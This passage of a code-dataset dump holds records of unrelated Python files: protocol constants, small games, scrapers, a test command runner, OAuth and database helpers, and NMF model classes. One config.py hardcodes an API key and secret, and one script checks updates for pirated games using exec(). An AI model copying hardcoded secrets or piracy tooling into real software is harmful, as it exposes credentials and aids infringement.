195\nWSTK_CFLOAT_P 209\nWSTK_CDOUBLE_P 210\nWSTK_CLONGDOUBLE_P 211\n'''\n\n# portable ?\nWSTK_CSHORT_P = (( BINARY_MASK | SIZEVARIANT_MASK | 1))\nWSTK_CINT_P = (( BINARY_MASK | SIZEVARIANT_MASK | 2))\nWSTK_CLONG_P = (( BINARY_MASK | SIZEVARIANT_MASK | 3))\nWSTK_CFLOAT_P = (( BINARY_MASK | SIZEVARIANT_MASK | REAL_MASK | 1))\nWSTK_CDOUBLE_P = (( BINARY_MASK | SIZEVARIANT_MASK | REAL_MASK | 2))\nWSTK_CLONGDOUBLE_P= (( BINARY_MASK | SIZEVARIANT_MASK | REAL_MASK | 3))\n\nWSTK_64BIT_LITTLEENDIAN_STRUCTURE=196\nWSTK_64BIT_BIGENDIAN_STRUCTURE =197\nWSTK_128BIT_EXTENDED =158\nWSTK_128BIT_LONGDOUBLE =158\nWSTK_96BIT_HIGHPADDED_INTEL_80BIT_EXTENDED=218\nWSTK_INTEL_80BIT_EXTENDED=216\n\nWSTK_CUCHAR =WSTK_8BIT_UNSIGNED_INTEGER\nWSTK_WSUCHAR=WSTK_8BIT_UNSIGNED_INTEGER\n\n#if LINUX_x86_64\nWSTK_CSHORT =WSTK_16BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_CINT =WSTK_32BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_CLONG =WSTK_64BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_CINT64 =WSTK_64BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_CSIZE_T =WSTK_64BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_CFLOAT =WSTK_LITTLEENDIAN_IEEE754_SINGLE\nWSTK_CDOUBLE =WSTK_LITTLEENDIAN_IEEE754_DOUBLE\nWSTK_CLONGDOUBLE =WSTK_LITTLEENDIAN_128BIT_DOUBLE\nWSTK_WSSHORT =WSTK_16BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_WSINT =WSTK_32BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_WSLONG =WSTK_64BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_WSINT64 =WSTK_64BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_WSSIZE_T =WSTK_64BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_WSFLOAT =WSTK_LITTLEENDIAN_IEEE754_SINGLE\nWSTK_WSDOUBLE =WSTK_LITTLEENDIAN_IEEE754_DOUBLE\nWSTK_WSLONGDOUBLE =WSTK_LITTLEENDIAN_128BIT_DOUBLE\n# TODO add windows and darwin version of above section\n\nWSLENGTH_DECODER = 1<<16\nWSTKPACKED_DECODER = 1<<17\nWSTKARRAY_DECODER = 
1<<18\nWSTKMODERNCHARS_DECODER= 1<<19\nWSTKNULLSEQUENCE_DECODER=0\nWSTKALL_DECODERS = (\n WSLENGTH_DECODER | WSTKPACKED_DECODER |\n WSTKARRAY_DECODER | WSTKMODERNCHARS_DECODER |\n WSTKNULLSEQUENCE_DECODER)\nWSTK_FIRSTUSER=0x30 # user token\nWSTK_LASTUSER =0x3F\n\n# ==== WSTP link options, renamed \"ML\" to \"WSLO\"\nWSLODefaultOptions = 0x00000000\nWSLONetworkVisible = 0x00000000\nWSLOLocallyVisible = 0x00000001\nWSLOInternetVisible = 0x00000002\n\nWSLOBrowse = 0x00000000\nWSLODontBrowse = 0x00000010\n\nWSLONonBlocking = 0x00000000\nWSLOBlocking = 0x00000020\n\nWSLOInteract = 0x00000000\nWSLODontInteract = 0x00000100\n\nWSLOForceYield = 0x00000200\nWSLOUseIPV6 = 0x00010000\nWSLOUseIPV4 = 0x00020000\n\nWSLOUseNewTCPIPConnection = 0x00100000\nWSLOUseOldTCPIPConnection = 0x00200000\nWSLOUseUUIDTCPIPConnection = 0x00000004\n\nWSLOUseAnyNetworkAddress = 0x00000008\n\n\n# ==== macro functions\n\nWSTK__IS_TEXT = lambda tok: ((tok & 0x00F6) == 0x0022)\nWSNE__IS_BINARY = lambda tok: ((tok) & BINARY_MASK)\nWSNE__IS_REAL = lambda tok: ((tok) & REAL_MASK)\nWSNE__TEXT_TOKEN = lambda tok: (WSTKREAL if WSNE__IS_REAL( tok) else WSTKINT)\n\n# ==== c typedefs\n\nWSENVPARAM_t = ctypes.c_void_p\nWSENV_t = ctypes.c_void_p\nWSTOKEN_t = ctypes.c_int\nWSLINK_t = ctypes.c_void_p\nWSLINKCALLBACK_t = ctypes.CFUNCTYPE(ctypes.c_int, WSLINK_t, ctypes.c_void_p)\nWSERRNO_t = ctypes.c_int\nWSLINKSERVER_t = ctypes.c_void_p\nWSLINKSERVERCALLBACK_t = ctypes.CFUNCTYPE(None, WSLINKSERVER_t, WSLINK_t)\nWSMARK_t = ctypes.c_void_p\nARRAY_METER_t = ctypes.c_void_p\n","sub_path":"wstp/wsdefs.py","file_name":"wsdefs.py","file_ext":"py","file_size_in_byte":9261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"266416265","text":"from sys import argv\nimport gamefunctions\nimport requests\nimport bs4\nimport re\n\n# Pirated game update checker. Stick references as needed.\ngameList = [\"OxygenNotIncluded\", \"Factorio\", \"ACEO\", \"BeamNG\", \"CitiesSkylines\", \"Civilisation\"]\n\ndef GetHTTP(hyperlink):\n response = requests.get(hyperlink)\n if response.status_code != 200:\n print(\"Response did not return 200. Returned \" + response.status_code)\n print(\"sendhelp_pls\")\n exit\n \n properText = bs4.BeautifulSoup(response.text, features=\"lxml\")\n properText.prettify()\n return properText\n\ndef readversion(fileLocation, whatToSub, whetherToSub):\n try: file = open(fileLocation, \"r\").read()\n except: return 0\n\n if whetherToSub:\n characters = \"[\" + whatToSub + \"]\"\n file = re.sub(characters, \"\", file)\n \n return file\n\ndef checkversion(gameName, onlineList, localVersion, numberType):\n convertedList = []\n convertedlocalVersion = 0\n isOutdated = False\n\n if numberType == int:\n for numbers in onlineList:\n convertedList.append(int(numbers))\n convertedlocalVersion = int(localVersion)\n \n if numberType == float:\n for numbers in onlineList:\n convertedList.append(float(numbers))\n convertedlocalVersion = float(localVersion)\n\n for soup in convertedList:\n if soup > convertedlocalVersion:\n print(gameName + \" is out-of-date! 
Local version is: \" + str(localVersion))\n print(\"Latest version should be: \" + onlineList[0])\n isOutdated = True\n break\n \n if not isOutdated:\n print(gameName + \" is up-to-date!\")\n\ndef main(argument):\n for games in gameList:\n if argument == games:\n command = str(\"gamefunctions.\" + games + \"()\")\n exec(command)\n \n if argument == \"--help\":\n print(\"\\nValid arguments:\")\n print(gameList)\n\nif __name__ == \"__main__\":\n if len(argv) == 2: main(argv[1])\n else: main(str(input(\"Valid arguments:\\n\" + str(gameList) + \"\\n\")))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"336909220","text":"import pygame\n\n\ndef start_screen(window, WIDTH, HEIGHT, FPS):\n intro_text = [\"ЗАСТАВКА\", \"\",\n \"Правила игры\",\n \"Если в правилах несколько строк,\",\n \"приходится выводить их построчно\"]\n\n fon = pygame.transform.scale(pygame.image.load('Sprites/bug-happy.png'), (WIDTH, HEIGHT))\n window.blit(fon, (0, 0))\n font = pygame.font.Font(None, 30)\n text_coord = 50\n for line in intro_text:\n string_rendered = font.render(line, 1, pygame.Color('black'))\n intro_rect = string_rendered.get_rect()\n text_coord += 10\n intro_rect.top = text_coord\n intro_rect.x = 10\n text_coord += intro_rect.height\n window.blit(string_rendered, intro_rect)\n\n\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYDOWN or event.type == pygame.MOUSEBUTTONDOWN:\n return 1# начинаем игру\n pygame.display.flip()\n pygame.time.Clock().tick(FPS)\n\n pygame.quit()","sub_path":"proekt_2021/start_game.py","file_name":"start_game.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"366618581","text":"import numpy as np\n\ndef make_pinwheel_data(radial_std, tangential_std, num_classes, num_per_class, rate):\n # code from Johnson et. al. 
(2016)\n rads = np.linspace(0, 2*np.pi, num_classes, endpoint=False)\n\n np.random.seed(1)\n\n features = np.random.randn(num_classes*num_per_class, 2) \\\n * np.array([radial_std, tangential_std])\n features[:,0] += 1.\n labels = np.repeat(np.arange(num_classes), num_per_class)\n\n angles = rads[labels] + rate * np.exp(features[:,0])\n rotations = np.stack([np.cos(angles), -np.sin(angles), np.sin(angles), np.cos(angles)])\n rotations = np.reshape(rotations.T, (-1, 2, 2))\n\n feats = 10 * np.einsum('ti,tij->tj', features, rotations)\n\n data = np.random.permutation(np.hstack([feats, labels[:, None]]))\n\n return data[:, 0:2], data[:, 2].astype(np.int) \n","sub_path":"pinwheel.py","file_name":"pinwheel.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"616989014","text":"api = {\n 'key': 'Ap1K@ti0n',\n 'secret': 'SXQxc1N1cGVyNTNjJWV0Cg',\n 'version': '1.0.0'\n}\n\nservice = {\n 'host': '127.0.0.1',\n 'port': 5002,\n 'build_base': False,\n 'heroku': False\n}\n\ndata = {\n 'path': './data',\n 'features': {\n 'keyboard': ['pp', 'wp', 'ds', 'dst', 'bs'],\n 'mouse': ['cc', 'ac', 'cp', 'dc']\n },\n 'classes': ['name'],\n 'estimators': 100\n}\n\nlog = {\n 'file': './log/server.log',\n 'format': '%(levelname) -5s %(asctime)s %(message)s',\n 'keep': 5,\n 'level': 'debug',\n 'limit': 1000000\n}\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"49446851","text":"import cv2\nfrom matplotlib import pyplot as plt \n\nsrc = cv2.imread(\"src_edge.jpg\")\n\n_, axs = plt.subplots(1, 4)\n\n# show src image\nimg = cv2.cvtColor(src, cv2.COLOR_BGR2RGB)\naxs[0].imshow(img)\n\n# preprocess by blurring and grayscale\nimg = cv2.GaussianBlur(src, (7, 7), 0)\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\naxs[1].imshow(cv2.cvtColor(img, cv2.COLOR_GRAY2RGB))\n\n# find binary image with thresholding\n_, img_thresh = cv2.threshold(img, 80, 255, cv2.THRESH_BINARY)\naxs[2].imshow(cv2.cvtColor(img_thresh, cv2.COLOR_GRAY2RGB))\n\n# find binary image with edges\nimg_canny = cv2.Canny(img, threshold1=90, threshold2=110)\naxs[3].imshow(cv2.cvtColor(img_canny, cv2.COLOR_GRAY2RGB))\n\nplt.show()\n","sub_path":"day3-1/code/python/02_edge.py","file_name":"02_edge.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"247724055","text":"\"\"\"\nContains\n - Rules\n - Applies Rules to Players\n - Deck changes happen here\n\"\"\"\nfrom player import Player\nfrom deck import Deck\n\nclass War():\n\n def __init__(self, \n player1_name='Gambit',\n player1_win_slogan='Great game!',\n player1_lose_slogan='Oh no! My mortgage!',\n player2_name='Cyclops',\n player2_win_slogan='Excellent game!',\n player2_lose_slogan='Oh no! 
Rogue!'):\n        self.player1 = Player(name=player1_name,\n                              win_slogan=player1_win_slogan,\n                              lose_slogan=player1_lose_slogan)\n        self.player2 = Player(name=player2_name,\n                              win_slogan=player2_win_slogan,\n                              lose_slogan=player2_lose_slogan)\n        self.deck = Deck()\n        self.deal()\n        self.middle_cards = []\n        self.round_number = 0\n\n    def deal(self):\n        player1_hand = self.deck.cards[0::2]\n        player2_hand = self.deck.cards[1::2]\n        self.player1.hand = player1_hand\n        self.player2.hand = player2_hand\n        print(\"Cards have been dealt.\")\n        pass\n    \n\n    def add_to_middle(self, cards):\n        self.middle_cards.extend(cards)\n\n\n    def reset_middle(self):\n        self.middle_cards = []\n\n    def play_round(self):\n        self.round_number += 1\n        print('Round Number = {}'.format(self.round_number))\n        p1_card = self.player1.draw_one()\n        p2_card = self.player2.draw_one()\n        self.add_to_middle(cards=[p1_card,p2_card])\n        print(\"Playing Round Number {}.\".format(self.round_number))\n        print(p1_card, p2_card)\n        if p1_card > p2_card:\n            self.player1.take_cards(cards=self.middle_cards)\n            print(\"Player 1 wins this round!\")\n            self.reset_middle()\n        elif p2_card > p1_card:\n            self.player2.take_cards(cards=self.middle_cards)\n            print(\"Player 2 wins this round!\")\n            self.reset_middle()\n        else:\n            print(\"War!\")\n            self.play_war()\n\n\n    def play_war(self):\n        #draw 2 cards and add to the middle\n        print(\"WAR!!!!!!!!!\")\n        p1_facedown = self.player1.draw_one()\n        p2_facedown = self.player2.draw_one()\n        self.add_to_middle([p1_facedown, p2_facedown])\n        self.play_round()\n        pass\n    \n\n    def play_game(self):\n        while self.player1.hand and self.player2.hand:\n            self.play_round()\n        print(\"GAME OVER, MAN!!!\")\n        if self.player1.hand:\n            print(\"{} Wins!\".format(self.player1.name))\n        else:\n            print(\"{} Wins!\".format(self.player2.name))\n        pass\n\n    \n\n\n# Testing to make sure the code works\nif __name__==\"__main__\":\n    war = War()\n    print(war.deck.cards)\n    print(war.player1.hand)\n    print(war.player2.hand)\n    war.play_game()","sub_path":"war.py","file_name":"war.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"492678703","text":"import MySQLdb.cursors\n\nclass EventEmotion:\n    def __init__(self, eventemotion_id, event_id, emotion_id, display_index):\n        self.eventemotion_id = eventemotion_id\n        self.event_id = event_id\n        self.emotion_id = emotion_id\n        self.display_index = display_index\n\ndef create(db, event_id, emotion_id, display_index):\n    query_str = 'INSERT INTO {0} ({1}, {2}, {3}) values (%s, %s, %s)'.format(TABLE_NAME, FIELD_EVENTID, FIELD_EMOTIONID, FIELD_DISPLAYINDEX)\n    curs = db.cursor()\n    curs.execute(query_str, [event_id, emotion_id, display_index])\n    eventemotion_id = curs.lastrowid\n    db.commit()\n    return EventEmotion(eventemotion_id, event_id, emotion_id, display_index)\n\ndef get_all_by_x(db, field, x):\n    query_str = 'SELECT {0}, {1}, {2}, {3} FROM {4} WHERE {5}=%s'.format(FIELD_EVENTEMOTIONID, FIELD_EVENTID, FIELD_EMOTIONID, FIELD_DISPLAYINDEX, TABLE_NAME, field)\n    cur = db.cursor()\n    cur.execute(query_str, [x])\n    entries = [EventEmotion(row[0], row[1], row[2], int(row[3])) for row in cur.fetchall()]\n    return entries\n\ndef get_all_by_eventid(db, event_id):\n    entries = get_all_by_x(db, FIELD_EVENTID, event_id)\n    return entries\n\ndef delete_by_x(db, field, x):\n    query_str = 'DELETE FROM {0} WHERE {1}=%s'.format(TABLE_NAME, field)\n    db.cursor().execute(query_str, [x])\n    db.commit()\n\ndef delete(db, eventemotion_id):\n    delete_by_x(db, FIELD_EVENTEMOTIONID, 
eventemotion_id)\n\ndef delete_all_for_event(db, event_id):\n delete_by_x(db, FIELD_EVENTID, event_id)\n\n##################\n# DB Definitions #\n##################\nTABLE_NAME = 'eventemotions'\nFIELD_EVENTEMOTIONID = 'eventemotion_id'\nFIELD_EVENTID = 'event_id'\nFIELD_EMOTIONID = 'emotion_id'\nFIELD_DISPLAYINDEX = 'display_index'\n","sub_path":"ru_eventemotion.py","file_name":"ru_eventemotion.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"97440809","text":"#\n# Copyright (c) [2021] Huawei Technologies Co.,Ltd.All rights reserved.\n#\n# OpenArkCompiler is licensed under Mulan PSL v2.\n# You can use this software according to the terms and conditions of the Mulan PSL v2.\n#\n# http://license.coscl.org.cn/MulanPSL2\n#\n# THIS SOFTWARE IS PROVIDED ON AN \"AS IS\" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR\n# FIT FOR A PARTICULAR PURPOSE.\n# See the Mulan PSL v2 for more details.\n#\n\nimport os\nimport sys\n\nfrom case.component import Component\nfrom env_var import EnvVar\nfrom case.case_executor.command_executor.shell import Shell\n\n\nclass OriginExecute(Component):\n\n def __init__(self, input: dict):\n self.case_name = input[\"case_name\"]\n self.command_suite = input[\"command_suite\"]\n self.detail = input[\"detail\"]\n self.result_suite = {\"PASSED\": set(), \"FAILED\": set(), \"TIMEOUT\": set()}\n\n def execute(self):\n for mode in self.command_suite.keys():\n case = SingleCaseExecutor(self.case_name, mode, self.command_suite[mode], self.detail)\n case.execute()\n result = case.get_result()\n self.result_suite[result].add(mode)\n\n def get_output(self):\n return {self.case_name: self.result_suite}\n\nclass SingleCaseExecutor(object):\n\n def __init__(self, case_name: str, mode: str, command_list: list, detail: bool):\n self.case_name = case_name\n self.mode = mode\n self.command_list = command_list\n self.detail = detail\n self.case_path = os.path.join(EnvVar.TEST_SUITE_ROOT, self.case_name)\n self.result = \"\"\n\n def execute(self):\n passed, passed_in_color = \"PASSED\", \"\\033[1;32mPASSED\\033[0m\"\n failed, failed_in_color = \"FAILED\", \"\\033[1;31mFAILED\\033[0m\"\n timeout, timeout_in_color = \"TIMEOUT\", \"\\033[1;33mTIMEOUT\\033[0m\"\n self.result, result_in_color = passed, passed_in_color\n if self.detail:\n for command in self.command_list:\n print(\"\\033[1;32m[[ CMD : \" + command + \" ]]\\033[0m\")\n exe = Shell(command=command, workdir=self.case_path, timeout=5000)\n exe.execute()\n com_out, com_err, return_code = exe.get_output()\n if com_out is not None and len(com_out) != 0:\n print(com_out)\n if com_err is not None and len(com_err) != 0:\n print(com_err)\n if return_code == 124:\n print(\"ERROR : TIMEOUT !\")\n self.result, result_in_color = timeout, timeout_in_color\n break\n elif return_code != 0:\n print(\"ERROR : FAILED !\")\n self.result, result_in_color = failed, failed_in_color\n break\n else:\n log_file = open(os.path.join(self.case_path, self.mode + \"_run.log\"), \"w+\")\n for command in self.command_list:\n log_file.write(\"[[ CMD : \" + command + \" ]]\\n\")\n exe = Shell(command=command, workdir=self.case_path, timeout=5000)\n exe.execute()\n com_out, com_err, return_code = exe.get_output()\n if com_out is not None and len(com_out) != 0:\n log_file.write(com_out + \"\\n\")\n if com_err is not None and len(com_err) != 0:\n log_file.write(com_err + \"\\n\")\n 
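# a return code of 124 is the conventional timeout exit status (e.g. GNU coreutils timeout)\n                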
if return_code == 124:\n log_file.write(\"ERROR : TIMEOUT !\\n\")\n self.result, result_in_color = timeout, timeout_in_color\n break\n elif exe.return_code != 0:\n log_file.write(\"ERROR : FAILED !\\n\")\n self.result, result_in_color = failed, failed_in_color\n break\n print(self.case_name + \" \" + self.mode + \" \" + result_in_color)\n sys.stdout.flush()\n\n def get_result(self):\n return self.result\n","sub_path":"testsuite/driver/src/case/case_executor/origin_execute.py","file_name":"origin_execute.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"569988965","text":"from flask import Blueprint, render_template, redirect, request\nfrom services.spotify import authorizationURL as spotifyAuthorizationURL\nfrom services.spotify import parseAuthorizationResponse as spotifyParseAuthorizationResponse\nfrom services.spotify import requestAccessAndRefreshTokens as spotifyRequestTokens\n\nauthorization = Blueprint('authorization', __name__)\n\n@authorization.route('/spotify')\ndef spotifyAuthorization():\n\treturn redirect(spotifyAuthorizationURL()) #allow user to login to their account, granting access\n\n# This is the url that the user is redirected to upon the user (not) permitting the application to get access\n# to their account. The status of the authorization is embedded in the url.\n# On success, the auth code will be used to request access and refresh tokens\n# Otherwise, the error message is displayed\n@authorization.route('/spotify/callback')\ndef spotifyAuthorizationCallback():\n\tsuccess, auth_token =spotifyParseAuthorizationResponse()\n\tif success is True:\n\t\t#request refresh and access tokens\n\t\ttokens = spotifyRequestTokens(auth_token)\n\n\telse:\n\t\trender_template('spotify_access_denied.html', error=auth_token)\t#auth_token will contain the error type","sub_path":"views/authorization.py","file_name":"authorization.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"619202724","text":"from typing import List, Optional\n\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\nfrom . import cache\nfrom .datasources.fangraphs import fg_team_batting_data\nfrom .datasources.bref import BRefSession\n\nsession = BRefSession()\n\n# This is just a pass through for the new, more configurable function\nteam_batting = fg_team_batting_data\n\n\n@cache.df_cache()\ndef team_batting_bref(team: str, start_season: int, end_season: Optional[int]=None) -> pd.DataFrame:\n \"\"\"\n Get season-level Batting Statistics for Specific Team (from Baseball-Reference)\n\n ARGUMENTS:\n team : str : The Team Abbreviation (i.e. 'NYY' for Yankees) of the Team you want data for\n start_season : int : first season you want data for (or the only season if you do not specify an end_season)\n end_season : int : final season you want data for\n \"\"\"\n if start_season is None:\n raise ValueError(\n \"You need to provide at least one season to collect data for. 
Try team_batting_bref(season) or team_batting_bref(start_season, end_season).\"\n )\n if end_season is None:\n end_season = start_season\n\n url = \"https://www.baseball-reference.com/teams/{}\".format(team)\n\n raw_data = []\n headings: Optional[List[str]] = None\n for season in range(start_season, end_season+1):\n print(\"Getting Batting Data: {} {}\".format(season, team))\n stats_url = \"{}/{}.shtml\".format(url, season)\n response = session.get(stats_url)\n soup = BeautifulSoup(response.content, 'html.parser')\n\n table = soup.find_all('table', {'class': 'sortable stats_table'})[0]\n\n if headings is None:\n headings = [row.text.strip() for row in table.find_all('th')[1:28]]\n\n rows = table.find_all('tr')\n for row in rows:\n cols = row.find_all('td')\n cols = [ele.text.strip() for ele in cols]\n cols = [col.replace('*', '').replace('#', '') for col in cols] # Removes '*' and '#' from some names\n cols = [col for col in cols if 'Totals' not in col and 'NL teams' not in col and 'AL teams' not in col] # Removes Team Totals and other rows\n cols.insert(2, season)\n raw_data.append([ele for ele in cols[0:]])\n\n assert headings is not None\n headings.insert(2, \"Year\")\n data = pd.DataFrame(data=raw_data, columns=headings) # [:-5] # -5 to remove Team Totals and other rows\n data = data.dropna() # Removes Row of All Nones\n\n return data\n","sub_path":"pybaseball/team_batting.py","file_name":"team_batting.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"257572759","text":"\n\nfrom xai.brain.wordbase.verbs._defraud import _DEFRAUD\n\n#calss header\nclass _DEFRAUDS(_DEFRAUD, ):\n\tdef __init__(self,): \n\t\t_DEFRAUD.__init__(self)\n\t\tself.name = \"DEFRAUDS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"defraud\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_defrauds.py","file_name":"_defrauds.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"102944319","text":"import numpy as np\nimport pandas as pd\nimport datetime\nimport sys\nfrom datetime import datetime\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.decomposition import NMF\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import ParameterGrid\n\nclass NMF_Model(object):\n\n def __init__(self, X, y, seed,\n cv=70,\n n_comp=[5, 6, 7], # 2-8 components were first tried before narrowing down the parameter search space to between 5 and 7 after results from an initial run\n alpha=[0.5, 1, 2],\n solver=[\"cd\"]\n ):\n self.results_name = None\n self.X = X\n self.y = y\n self.seed = seed\n self.cv = cv\n self.n_comp = n_comp\n self.alpha = alpha\n self.solver = solver\n self.pipe = None\n\n self.param_grid = {\"nmf__solver\": self.solver,\n \"nmf__n_components\": self.n_comp,\n \"nmf__alpha\": self.alpha\n }\n\n self.TESTparam_grid = {\"nmf__solver\": self.solver,\n \"nmf__n_components\": [7],\n \"nmf__alpha\": [2]}\n\n def change_y(self):\n if isinstance(self.y, pd.DataFrame):\n self.y = np.array(self.y['SLAVERY'])\n return\n\n def print_start(self):\n num_fits = self.num_fits\n num_iterations = self.num_iterations\n grid_print = self.grid_print\n f = self.f\n print(\"The number of fits =\" + str(num_fits), file=f)\n print(\"The number of iterations =\" + str(num_iterations), file=f)\n 
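# grid_print is a plain dict on normal runs; the test path stores dict_items (see LOOCV), which the .items() call below would not accept\n        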
print(\"Params iterating over = \" + str(list(grid_print.items())), file=f)\n f.flush()\n\n def print_best_params(self, error, params):\n print(\"UPDATE MAE: \" + str(error), file=self.f)\n print(\"UPDATE Best params = \" + str(params), file=self.f)\n self.f.flush()\n\n def print_nrows(self, p, params, param_start_time_n):\n print(\"Fit num: \" + str(p) + \"/\" + str(self.num_fits) +\n \"...\" + str(np.round((p / self.num_fits) * 100, 0)) + \"%\", file=self.f)\n param_set_time_n = datetime.now() - param_start_time_n\n print(\"Time taken: \" + str(param_set_time_n), file=self.f)\n print(\"Current params = \" + str(params), file=self.f)\n self.f.flush()\n\n def print_end_results(self, params, runtime):\n print(\"==== RUN: \" + str(datetime.now()) + \" ====\"\n , file=open(self.results_name, \"w\"))\n print(\"RESULTS MAE: \" + str(params['Error']), file=open(self.results_name, \"a\"))\n print(\"RESULTS Best params = \" + str(params['Params']), file=open(self.results_name, \"a\"))\n print(\"RUNTIME: \" + str(runtime), file=open(self.results_name, \"a\"))\n sys.stdout.close()\n\n def update_rash_params(self, error, params):\n self.rash_params[error] = params\n\n def update_best_params(self, error, params):\n self.Results['Params'] = params\n self.Results['Error'] = error\n\n def LOOCV(self, verbose_name, rash_threshold, rash_results_name, n_folds, print_every_nrows,\n test):\n n = self.X.shape[0]\n self.rash_params = {}\n self.Results = {}\n current_mae = 1\n p = 0\n\n # If string index's, need to be re-set:\n self.X.reset_index(inplace=True, drop=True)\n self.y.reset_index(inplace=True, drop=True)\n\n grid_start = datetime.now()\n self.f = open(verbose_name, \"w\")\n print(str(grid_start), file=self.f)\n param_start_time_n = datetime.now()\n\n if test == True:\n self.grid_print = self.TESTparam_grid.items()\n self.grid = ParameterGrid(self.TESTparam_grid)\n else:\n self.grid_print = self.param_grid\n self.grid = ParameterGrid(self.param_grid)\n\n self.num_fits = len(list(self.grid))\n self.num_iterations = self.num_fits * n_folds\n self.print_start()\n\n for param in list(self.grid):\n err_fold_list = []\n self.set_pipeline(**param)\n\n for i in range(0, n_folds):\n X_test_fold = pd.DataFrame(self.X.iloc[i, :]).transpose()\n X_train_folds = self.X.drop(i, axis=0)\n y_test_fold = self.y.iloc[i, :]\n y_train_folds = self.y.drop(i, axis=0)\n\n m1 = self.pipe.fit(X_train_folds, y_train_folds.values.ravel())\n pred = m1.predict(X_test_fold)\n err = abs(y_test_fold.values - pred)\n err_fold_list.append(err[0])\n self.f.flush()\n\n param_mae = pd.Series(err_fold_list).mean()\n self.f.flush()\n\n if param_mae <= rash_threshold:\n self.update_rash_params(error=param_mae, params=param)\n\n if param_mae <= current_mae:\n current_mae = param_mae\n self.update_best_params(error=param_mae, params=param)\n self.print_best_params(error=param_mae, params=param)\n\n # Print where at in grid search every n_rows:\n p = p + 1\n if p % print_every_nrows == 0:\n self.print_nrows(p=p, params=param, param_start_time_n=param_start_time_n)\n\n # Save Rashomon Set parameters every nrows:\n Rashomon_models = pd.DataFrame.from_dict(self.rash_params, orient='index')\n with open(rash_results_name, 'w') as r_file:\n Rashomon_models.to_csv(r_file)\n r_file.flush()\n\n # Save final set of Rashomon Set params:\n if p == self.num_fits:\n Rashomon_models = pd.DataFrame.from_dict(self.rash_params, orient='index')\n with open(rash_results_name, 'w') as r_file:\n Rashomon_models.to_csv(r_file)\n r_file.flush()\n\n # Calculate and 
print runtime:\n Runtime = datetime.now() - grid_start\n print(\"Total Run time: \" + str(Runtime), file=self.f)\n self.f.flush()\n self.f.close()\n\n self.print_end_results(params=self.Results, runtime=Runtime)\n\n return\n\n def set_pipeline(self, **kwargs):\n return\n\n\nclass NMF_LM(NMF_Model):\n\n def __init__(self, X, y, seed, nmf_max_iter, tol, results_name):\n super().__init__(X, y, seed)\n self.results_name = results_name\n self.tol = tol\n self.nmf_max_iter = nmf_max_iter\n self.seed = seed\n\n self.param_grid[\"nmf__random_state\"] = self.seed\n return\n\n def set_pipeline(self, nmf__solver, nmf__n_components, nmf__alpha, nmf__random_state):\n self.pipe = Pipeline([\n (\"nmf\", NMF(init=\"nndsvd\", solver=nmf__solver, max_iter=self.nmf_max_iter,\n tol=self.tol,\n n_components=nmf__n_components, alpha=nmf__alpha,\n verbose=0, random_state=nmf__random_state)),\n (\"lm\", LinearRegression())])\n\n\nclass NMF_DT(NMF_Model):\n\n def __init__(self, X, y, seed, nmf_max_iter, tol, results_name,\n min_samples_split=[2, 3, 4],\n max_depth=[3, 4, 5, 6]):\n super().__init__(X, y, seed)\n self.results_name = results_name\n self.nmf_max_iter = nmf_max_iter\n self.tol = tol\n\n self.param_grid[\"dt__random_state\"] = seed\n self.param_grid[\"dt__min_samples_split\"] = min_samples_split\n self.param_grid[\"dt__max_depth\"] = max_depth\n\n self.TESTparam_grid[\"dt__random_state\"] = self.seed\n self.TESTparam_grid[\"dt__min_samples_split\"] = [3]\n 